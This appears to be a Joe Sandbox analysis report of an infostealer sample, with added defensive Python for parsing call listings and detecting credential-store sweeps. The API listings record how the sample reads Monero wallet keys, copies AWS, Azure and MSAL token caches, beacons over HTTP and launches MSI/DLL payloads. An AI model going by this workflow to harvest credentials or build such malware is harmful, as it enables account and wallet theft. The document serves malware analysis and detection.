                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: f272be415cdd41db303acd3371c283272ba4f0b0d3e956509f76ea62f20d73bc
                                        • Instruction ID: e77646ed72e0b89945579196809041491bc15f6ce60d7c02d5f4c9b4820d1365
                                        • Opcode Fuzzy Hash: f272be415cdd41db303acd3371c283272ba4f0b0d3e956509f76ea62f20d73bc
                                        • Instruction Fuzzy Hash: 4D121B71820128BADB15EBA0DC95FEEB37CBF14700F5041A9F14676491EF702A4AEF65
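The function above is the sample's HTTP client: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), HttpSendRequestA, and InternetReadFile in 0xC7-byte chunks, with "------" boundary strings for a multipart body. Note that the report lists the calls in the order its analysis recorded them, not in program order: HttpOpenRequestA at 00CA5BF8 is printed after the InternetCloseHandle calls that follow it in the code. Sorting by the `ref` address restores the sequence. The script below is an added example and not part of the Joe Sandbox report: it parses a constructed copy of the API lines above, reorders them by address, confirms the open-connect-request-send-read chain a WinINet beacon needs, and decodes the service and flag constants so the same check can be run over other function listings in a report. The address-order heuristic and the constant tables are this example's assumptions, not something the report states.

```python
import re
from typing import List, Optional

# Constructed copy of the API lines for the function at 00CA59F8.
REPORT_LINES = """
  • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA59F8
• StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA5A13
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA5B93
• GetProcessHeap.KERNEL32(00000000,?), ref: 00CA5E93
• RtlAllocateHeap.NTDLL(00000000), ref: 00CA5E9A
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA5F2F
• InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CA5F4C
• InternetCloseHandle.WININET(00000000), ref: 00CA5FB0
• InternetCloseHandle.WININET(00000000), ref: 00CA5FBD
• HttpOpenRequestA.WININET(00000000,009DF250,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA5BF8
• InternetCloseHandle.WININET(00000000), ref: 00CA5FC7
""".strip().splitlines()

# "• Name.MODULE(args), ref: ADDR"; "Part of subcall function" lines do not match
# and are skipped because they belong to callees, not to this function.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# wininet.h constants
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
HTTP_OPEN_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# Order in which a WinINet HTTP beacon must issue these calls.
BEACON_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                "HttpSendRequestA", "InternetReadFile"]


def parse_calls(lines: List[str]) -> List[dict]:
    """Parse the listing and return the calls sorted by call-site address."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)})
    return sorted(calls, key=lambda c: c["ref"])


def _hex_arg(args: List[str], i: int) -> Optional[int]:
    """Numeric argument i, or None when the report shows '?' for it."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def find_wininet_chain(lines: List[str]) -> Optional[dict]:
    """Return decoded beacon parameters if the full chain appears in address order."""
    stage, matched = 0, {}
    for call in parse_calls(lines):
        if stage < len(BEACON_CHAIN) and call["api"] == BEACON_CHAIN[stage]:
            matched[call["api"]] = call
            stage += 1
    if stage < len(BEACON_CHAIN):
        return None
    service = _hex_arg(matched["InternetConnectA"]["args"], 5)      # dwService
    flags = _hex_arg(matched["HttpOpenRequestA"]["args"], 6) or 0   # dwFlags
    known = sum(HTTP_OPEN_FLAGS)
    return {
        "service": INTERNET_SERVICE.get(service, f"unknown({service})"),
        "open_request_flags": sorted(n for bit, n in HTTP_OPEN_FLAGS.items() if flags & bit),
        "unknown_flag_bits": flags & ~known & 0xFFFFFFFF,
        "read_chunk": _hex_arg(matched["InternetReadFile"]["args"], 2),  # dwNumberOfBytesToRead
        "first_ref": matched["InternetOpenA"]["ref"],
        "last_ref": matched["InternetReadFile"]["ref"],
    }


if __name__ == "__main__":
    print(find_wininet_chain(REPORT_LINES))
```

The absence of INTERNET_FLAG_SECURE in the decoded flags means the request is plain HTTP, which is consistent with the Suricata alerts on the traffic; a sample that set 0x00800000 would need TLS inspection or endpoint telemetry instead.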
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CACF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CAD0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CAD0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD208
                                        • lstrcat.KERNEL32(?,00CC1478), ref: 00CAD217
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD22A
                                        • lstrcat.KERNEL32(?,00CC147C), ref: 00CAD239
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD24C
                                        • lstrcat.KERNEL32(?,00CC1480), ref: 00CAD25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD26E
                                        • lstrcat.KERNEL32(?,00CC1484), ref: 00CAD27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD290
                                        • lstrcat.KERNEL32(?,00CC1488), ref: 00CAD29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD2B2
                                        • lstrcat.KERNEL32(?,00CC148C), ref: 00CAD2C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD2D4
                                        • lstrcat.KERNEL32(?,00CC1490), ref: 00CAD2E3
                                          • Part of subcall function 00CBA820: lstrlen.KERNEL32(00CA4F05,?,?,00CA4F05,00CC0DDE), ref: 00CBA82B
                                          • Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0DDE,00000000), ref: 00CBA885
                                        • lstrlen.KERNEL32(?), ref: 00CAD32A
                                        • lstrlen.KERNEL32(?), ref: 00CAD339
                                          • Part of subcall function 00CBAA70: StrCmpCA.SHLWAPI(009D8C28,00CAA7A7,?,00CAA7A7,009D8C28), ref: 00CBAA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAD3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 54bdd61bbfcf834269a39260d10819830fbdf09fef1a6377185e36c8bdedf469
                                        • Instruction ID: 296e1dfa1944c6cefe3f4150c7d0de3f5fc04623b65bcb84237b1f832c9cc527
                                        • Opcode Fuzzy Hash: 54bdd61bbfcf834269a39260d10819830fbdf09fef1a6377185e36c8bdedf469
                                        • Instruction Fuzzy Hash: B5E11A71910109AFCB18EBA1DD96EEE7378AF14301F144168F547B70A1DE35BA0AEB62
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009DD3F8,00000000,?,00CC144C,00000000,?,?), ref: 00CACA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CACA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00CACA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CACAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CACAD9
                                        • StrStrA.SHLWAPI(?,009DD4E8,00CC0B52), ref: 00CACAF7
                                        • StrStrA.SHLWAPI(00000000,009DD410), ref: 00CACB1E
                                        • StrStrA.SHLWAPI(?,009DD920,00000000,?,00CC1458,00000000,?,00000000,00000000,?,009D8B58,00000000,?,00CC1454,00000000,?), ref: 00CACCA2
                                        • StrStrA.SHLWAPI(00000000,009DDA60), ref: 00CACCB9
                                          • Part of subcall function 00CAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CAC871
                                          • Part of subcall function 00CAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CAC87C
                                        • StrStrA.SHLWAPI(?,009DDA60,00000000,?,00CC145C,00000000,?,00000000,009D8AC8), ref: 00CACD5A
                                        • StrStrA.SHLWAPI(00000000,009D89B8), ref: 00CACD71
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B46), ref: 00CAC943
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B47), ref: 00CAC957
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B4E), ref: 00CAC978
                                        • lstrlen.KERNEL32(00000000), ref: 00CACE44
                                        • CloseHandle.KERNEL32(00000000), ref: 00CACE9C
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 918248356c2bcecb0ce60dc29d0d32bc11512fb2b3ff44f03a1dc581ca6abe9d
                                        • Instruction ID: 053ec0ca2588ae6b50920436787bca18f6d83705f02be8afca9d8d8ac63c0506
                                        • Opcode Fuzzy Hash: 918248356c2bcecb0ce60dc29d0d32bc11512fb2b3ff44f03a1dc581ca6abe9d
                                        • Instruction Fuzzy Hash: 06E1F771C10108BFDB14EBA1DCA6FEEB778AF14300F444169F146B6592EF316A4ADB62
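Every per-function listing on this page follows the same layout: an `APIs` line, one bullet per call (indented bullets marked "Part of subcall function" are calls made through a helper, not by the function itself), the memory-dump attribution, and a Similarity section whose `String ID` line carries the function's string literals separated by `$`, closed by the `Instruction Fuzzy Hash` line. Two of the listings above show call orders worth recognising automatically: the function at 00CACF83 stages a file with CopyFileA and later removes it with DeleteFileA, and the function at 00CACA6C reads a whole file by seeking to the end (SetFilePointer with dwMoveMethod 2, FILE_END), taking GetFileSize, seeking back to the start (dwMoveMethod 0, FILE_BEGIN) and calling ReadFile before scanning the buffer with StrStrA. The Python below is an added example, not part of Joe Sandbox or of this report: it parses that layout from a constructed excerpt assembled from calls shown on this page and flags such call-order idioms as ordered subsequences of the direct calls. The idiom names, the argument checks and the subsequence matcher are my own.

```python
"""Parse Joe Sandbox per-function API listings and flag call-sequence idioms.

Added example; not part of the report or of Joe Sandbox. The layout is taken
from the listings on this page; SAMPLE_REPORT is a constructed excerpt.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One call bullet: "• Name.MODULE(args), ref: ADDR"; indirect calls carry a
# "Part of subcall function XXXX:" prefix and wsprintfA is printed without args.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    via_subcall: Optional[str]   # helper address when the call is indirect


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fuzzy_hash: str = ""

    def direct_apis(self):
        """API names the function calls itself, in listing order."""
        return [c.api for c in self.calls if c.via_subcall is None]


def parse_report(text):
    """Split the listing into FunctionBlocks; a block runs from 'APIs' to its fuzzy hash."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionBlock()
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a != ""]
            cur.calls.append(Call(m.group("api"), m.group("mod"), args,
                                  m.group("ref"), m.group("sub")))
        elif s.startswith("• String ID:"):
            raw = s[len("• String ID:"):].strip()
            cur.strings = raw.split("$") if raw else []
        elif s.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = s.split(":", 1)[1].strip()
            blocks.append(cur)
            cur = None
    return blocks


# Idioms as ordered subsequences of direct calls; the optional predicate checks
# the printed arguments (SetFilePointer's 4th argument is dwMoveMethod).
IDIOMS = {
    "read whole file (seek end, size, seek start, read)": [
        ("CreateFileA", None),
        ("SetFilePointer", lambda a: len(a) >= 4 and a[3] == "00000002"),  # FILE_END
        ("GetFileSize", None),
        ("SetFilePointer", lambda a: len(a) >= 4 and a[3] == "00000000"),  # FILE_BEGIN
        ("ReadFile", None),
    ],
    "stage a copy then delete it": [("CopyFileA", None), ("DeleteFileA", None)],
    "walk registry subkeys": [("RegOpenKeyExA", None), ("RegEnumKeyExA", None)],
}


def matches_idiom(block, pattern):
    """True when the block's direct calls contain pattern as an ordered subsequence."""
    i = 0
    for call in block.calls:
        if call.via_subcall is not None:
            continue
        api, check = pattern[i]
        if call.api == api and (check is None or check(call.args)):
            i += 1
            if i == len(pattern):
                return True
    return False


def idioms_in(block):
    return [name for name, pat in IDIOMS.items() if matches_idiom(block, pat)]


# Constructed excerpt in the report's layout, trimmed to a few calls per function.
SAMPLE_REPORT = r"""
APIs
  • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CACA6C
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CACA89
• GetFileSize.KERNEL32(00000000,00000000), ref: 00CACA95
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CACAA8
• ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CACAD9
• CloseHandle.KERNEL32(00000000), ref: 00CACE9C
Memory Dump Source
• Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
Similarity
• String ID:
• Instruction Fuzzy Hash: 06E1F771C10108BFDB14EBA1DCA6FEEB778AF14300F444169F146B6592EF316A4ADB62
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CACF83
• lstrcat.KERNEL32(?,00000000), ref: 00CAD208
• DeleteFileA.KERNEL32(00000000), ref: 00CAD3B4
Similarity
• String ID:
• Instruction Fuzzy Hash: B5E11A71910109AFCB18EBA1DD96EEE7378AF14301F144168F547B70A1DE35BA0AEB62
APIs
• RegOpenKeyExA.ADVAPI32(00000000,009DB908,00000000,00020019,00000000,00CC05B6), ref: 00CB83A4
• RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
• wsprintfA.USER32 ref: 00CB8459
• RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
Similarity
• String ID: - $%s\%s$?
• Instruction Fuzzy Hash: 8681FA7191011CAFEB28DB54CC95FEAB7BCBB08700F008299F149A6180DF716B89DFA5
"""

if __name__ == "__main__":
    for b in parse_report(SAMPLE_REPORT):
        print(b.direct_apis(), b.strings, idioms_in(b))
```

Only direct calls feed the matcher, because a call listed under "Part of subcall function" belongs to a shared helper (lstrcpy at 00CBA740 appears under most functions on this page) and would otherwise make every block look alike; the registry-walk idiom is included so the `String ID` parsing can be seen on the listing that follows (RegOpenKeyExA then RegEnumKeyExA with the `%s\%s` format string).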
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • RegOpenKeyExA.ADVAPI32(00000000,009DB908,00000000,00020019,00000000,00CC05B6), ref: 00CB83A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
                                        • wsprintfA.USER32 ref: 00CB8459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8499
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 7b20410112ddadd82af7c0e274754d61b46d00f9d2f139e4a7a445b1f3efb173
                                        • Instruction ID: 7161e337edc9c6829eb73a10c2a83b911e7f8262a395814d870fc8b8aaf61bb3
                                        • Opcode Fuzzy Hash: 7b20410112ddadd82af7c0e274754d61b46d00f9d2f139e4a7a445b1f3efb173
                                        • Instruction Fuzzy Hash: 8681FA7191011CAFEB28DB54CC95FEAB7BCBB08700F008299F149A6180DF716B89DFA5
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00CB4DCD
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
                                          • Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00CB4E59
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                          • Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                          • Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00CB4EE5
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49B0
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC08D2), ref: 00CB49C5
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49E2
                                          • Part of subcall function 00CB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CB4A1E
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,009DF2C0), ref: 00CB4A4A
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,00CC0FF8), ref: 00CB4A5C
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,?), ref: 00CB4A70
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,00CC0FFC), ref: 00CB4A82
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,?), ref: 00CB4A96
                                          • Part of subcall function 00CB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CB4AAC
                                          • Part of subcall function 00CB4910: DeleteFileA.KERNEL32(?), ref: 00CB4B31
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 8edc1c2f332fcf90d3c629639c5f06dda499f3a10ae809e92b3d1c33202bee3c
                                        • Instruction ID: 5d7db87379fc9b4f4548e2564168387c8caa039af8f8bfb3906610c69cd4e0dc
                                        • Opcode Fuzzy Hash: 8edc1c2f332fcf90d3c629639c5f06dda499f3a10ae809e92b3d1c33202bee3c
                                        • Instruction Fuzzy Hash: 0641987994020867DB54F770DC8BFED333CAB65700F044468B689A60C2EDB56BC9DB92
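The listing above builds paths ending in `\.azure\`, `\.aws\` and `\.IdentityService\` (the Azure CLI, AWS CLI and MSAL token-cache directories; `msal.cache` in the string table is the MSAL cache file name), enumerates each with FindFirstFileA/FindNextFileA against `*.*`, filters names with PathMatchSpecA and copies matches with CopyFileA, with a DeleteFileA in the same helper. The Python below is an added detection example, not part of the report or of the sample: it runs over constructed file-read telemetry and flags a process whose image lives in a user-writable directory reading any of those stores, or one process reading more than one of them, which is the sweep pattern of this function and not how the legitimate CLIs behave. The event keys, the user-writable directory list and the sample events are assumptions for the demo.

```python
"""Flag processes that sweep cloud-CLI credential stores.

Added detection example, not part of the Joe Sandbox report or of the sample.
The directory fragments come from the string table above; the event layout,
the user-writable directory list and the sample telemetry are assumptions.
"""
from collections import defaultdict

# Directory fragments from the function's string table, lower-cased for matching.
STORE_DIRS = {
    "aws": "\\.aws\\",
    "azure": "\\.azure\\",
    "msal": "\\.identityservice\\",
}

# Locations writable without elevation (assumed list); a binary started from
# here and reading CLI tokens is far more suspicious than aws.exe doing so.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\downloads\\", "\\users\\public\\", "\\programdata\\")


def _norm(path):
    """Normalise separators and case so fragment matching is reliable."""
    return path.replace("/", "\\").lower()


def store_family(path):
    """Return 'aws', 'azure' or 'msal' when path lies under a target directory."""
    p = _norm(path)
    for family, fragment in STORE_DIRS.items():
        if fragment in p:
            return family
    return None


def flag_credential_store_access(events):
    """events: iterable of dicts with pid, image and path (file-read telemetry).

    Returns a list of (pid, image, reason, families) tuples."""
    per_process = defaultdict(lambda: {"image": "", "families": set()})
    for ev in events:
        family = store_family(ev["path"])
        if family is None:
            continue
        rec = per_process[ev["pid"]]
        rec["image"] = ev["image"]
        rec["families"].add(family)

    findings = []
    for pid, rec in per_process.items():
        families = sorted(rec["families"])
        if any(frag in _norm(rec["image"]) for frag in USER_WRITABLE):
            findings.append((pid, rec["image"],
                             "credential store read by binary in user-writable path", families))
        elif len(families) >= 2:
            findings.append((pid, rec["image"],
                             "single process harvested multiple credential stores", families))
    return findings


# Constructed sample telemetry (not from the report): aws.exe reading its own
# config is benign; file.exe from Temp sweeping all three directories matches
# the function above.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",
     "path": r"C:\Users\alice\.aws\credentials"},
    {"pid": 6612, "image": r"C:\Users\alice\AppData\Local\Temp\file.exe",
     "path": r"C:\Users\alice\.aws\credentials"},
    {"pid": 6612, "image": r"C:\Users\alice\AppData\Local\Temp\file.exe",
     "path": r"C:\Users\alice\.azure\azureProfile.json"},
    {"pid": 6612, "image": r"C:\Users\alice\AppData\Local\Temp\file.exe",
     "path": r"C:\Users\alice\AppData\Local\.IdentityService\msal.cache"},
    {"pid": 7004, "image": r"C:\Windows\System32\notepad.exe",
     "path": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for finding in flag_credential_store_access(SAMPLE_EVENTS):
        print(finding)
```

Matching on the directory rather than on individual file names mirrors the `*.*` enumeration in the listing: the sample copies everything under those directories, so any file there is in scope, and new token-cache file names do not need a rule change.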
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB906C
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 06769e1f33be518103d59bc877a93c8612cbb820dede7db3c1c96ef09ca3fe3e
                                        • Instruction ID: b336373f882d66bccb14dc6fa2ffee094974e7020dd4b8dbdddf48bc555879e0
                                        • Opcode Fuzzy Hash: 06769e1f33be518103d59bc877a93c8612cbb820dede7db3c1c96ef09ca3fe3e
                                        • Instruction Fuzzy Hash: 7171D9B5D10208AFDB04EFE5DC89FEEB7B9AB48700F148518F615AB290DB34A905DB61
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB31C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB34EA
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: f73b6f28739b9dc39567a6047772049e82c8dd1e140331101ad6ed31425939ab
                                        • Instruction ID: d5a687d73df7e5391d77b15af01e4ee4fdd267a48767341aad2e55cfaaadbcec
                                        • Opcode Fuzzy Hash: f73b6f28739b9dc39567a6047772049e82c8dd1e140331101ad6ed31425939ab
                                        • Instruction Fuzzy Hash: FB120D71C10108AADB19EBA0DC92FEEB73CAF14300F544169F54676591EF352B4AEFA2
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA6280: InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                          • Part of subcall function 00CA6280: StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
